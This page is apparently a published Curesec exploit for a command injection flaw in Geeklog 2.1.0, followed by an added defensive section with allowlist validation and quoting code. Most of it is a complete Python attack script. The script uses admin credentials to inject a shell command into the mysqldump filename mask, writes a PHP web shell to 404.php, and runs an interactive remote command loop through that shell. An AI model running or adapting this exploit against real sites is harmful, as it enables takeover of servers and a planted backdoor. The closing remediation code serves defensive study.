Geeklog 2.1.0 Command Injection
Source: curesec.com   Author: Tim Coen   Published: 2015-12-11
#!/usr/local/bin/python
# Exploit for geeklog-2.1.0 OS Command Injection vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import sys
import re
import argparse
import requests # requires requests lib

# Python 2/3 compatibility: raw_input() became input() in Python 3
try:
    input = raw_input
except NameError:
    pass

parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

url = args.url
username = args.username
password = args.password

loginPath = "/admin/moderation.php"
configPath = "/admin/configuration.php?tab-5"
backupPath = "/admin/database.php"

shellFileName = "404.php"
# The backslash survives into the injected shell command and keeps the "$"
# literal there, so the file written by echo contains $_GET, not an expansion
shellContent = "<?php passthru(\\$_GET['x']);"

def login(requestSession, url, username, password):
    postData = {"mode": "login", "warn": "1", "loginname": username, "passwd": password}
    loginResult = requestSession.post(url, data = postData).text
    return "Incorrect Login Information" not in loginResult and "You have exceeded the number of allowed login attempts" not in loginResult

def getCSRFToken(requestSession, url):
    # Geeklog's admin forms carry a per-page CSRF token named _glsectoken
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('name="_glsectoken" value="(.*)" />', csrfRequest.text)
    return csrfTokenRegEx.group(1)

def injectCommand(requestSession, url):
    # The mysqldump filename mask is a Core config value; closing its quote
    # and appending ";echo ..." stores a second command next to the backup command
    csrfToken = getCSRFToken(requestSession, url)
    postData = {"_glsectoken": csrfToken, "conf_group": "Core", "sub_group": "0", "form_submit": "true", "mysqldump_filename_mask": 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "' + shellContent + '" > ' + shellFileName + ';"'}
    requestSession.post(url, data = postData)

def executeCommand(requestSession, url):
    # Requesting a database backup makes Geeklog run the stored mask through the shell
    csrfToken = getCSRFToken(requestSession, url)
    requestSession.get(url + "?mode=backup&_glsectoken=" + csrfToken)

def runShell(url):
    print("enter command, or enter exit to quit.")
    command = input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = input("$ ")

requestSession = requests.session()
if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    exit("ERROR: could not log in")

print("injecting command")
injectCommand(requestSession, url + configPath)
print("executing command")
executeCommand(requestSession, url + backupPath)
runShell(url + "/admin/" + shellFileName + "?x=")

Blog Reference: https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-Exploit-120.html

--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
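The root cause the exploit above relies on is a configuration value (the mysqldump filename mask) being pasted into a shell command string. The following Python is an added, editor-written example, not code from the page or from the Geeklog project, showing how a backup routine can handle that value safely: validate it against a strict allowlist, expand the strftime placeholders itself, and hand mysqldump an argv list so no shell ever parses the filename, with shlex.quote as defense in depth for any code path that still builds a shell string. The function and constant names, the sample masks, and the use of mysqldump's --result-file option are this example's own choices; the injected sample mirrors the shape of the page's payload with the echoed content replaced by a neutral marker.

```python
import datetime
import re
import shlex

# Allowlist for a mysqldump filename mask: letters, digits, "_", "-", "." and
# the "%" that introduces strftime placeholders. No legitimate mask needs a
# quote, a semicolon, a redirect or a space.
MASK_PATTERN = re.compile(r'^[A-Za-z0-9_.%-]+$')

# Characters that let a value break out of a double-quoted shell string or
# chain a second command; reported so an admin or SOC can see why a value failed.
SHELL_META = frozenset(';|&$`"\'<>\n\t ')

# Constructed samples (hypothetical values, not taken from a real install):
# the benign mask is Geeklog's default shape, the injected one has the same
# shape as the page's payload with the echoed content replaced by "injected".
BENIGN_MASK = 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql'
INJECTED_MASK = 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "injected" > 404.php;"'


def is_safe_mask(mask):
    """True only if every character of the mask is in the allowlist."""
    return bool(MASK_PATTERN.match(mask))


def suspicious_chars(mask):
    """Sorted list of shell metacharacters found in the mask (empty if clean)."""
    return sorted(c for c in set(mask) if c in SHELL_META)


def build_backup_argv(db_name, mask, when):
    """Return the mysqldump invocation as an argv list, meant for
    subprocess.run(argv) without shell=True, so no shell parses the filename.
    Any mask outside the allowlist is rejected before placeholders are expanded."""
    if not is_safe_mask(mask):
        raise ValueError("rejected filename mask, contains %r" % suspicious_chars(mask))
    # Expand %Y, %m, ... in our own code rather than leaving it to a shell/date pipeline
    filename = when.strftime(mask)
    return ["mysqldump", "--result-file=" + filename, db_name]


def quote_for_shell(value):
    """Defense in depth for code that still builds a shell string: shlex.quote()
    is the Python counterpart of PHP's escapeshellarg() and turns the injected
    mask into a single harmless quoted argument instead of two commands."""
    return shlex.quote(value)


if __name__ == "__main__":
    now = datetime.datetime(2015, 12, 11, 12, 0, 0)  # fixed timestamp for a reproducible run
    print(build_backup_argv("geeklog", BENIGN_MASK, now))
    try:
        build_backup_argv("geeklog", INJECTED_MASK, now)
    except ValueError as err:
        print("blocked:", err)
    print(quote_for_shell(INJECTED_MASK))
```

The allowlist check is the real fix: it rejects the value at configuration time, so even an authenticated administrator (the precondition the exploit needs) cannot store a command. The argv form removes the shell from the backup path entirely, and quoting is only a fallback for legacy code that cannot be converted. Logging the output of suspicious_chars on a rejected value gives a cheap detection signal for attempts against this setting.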

 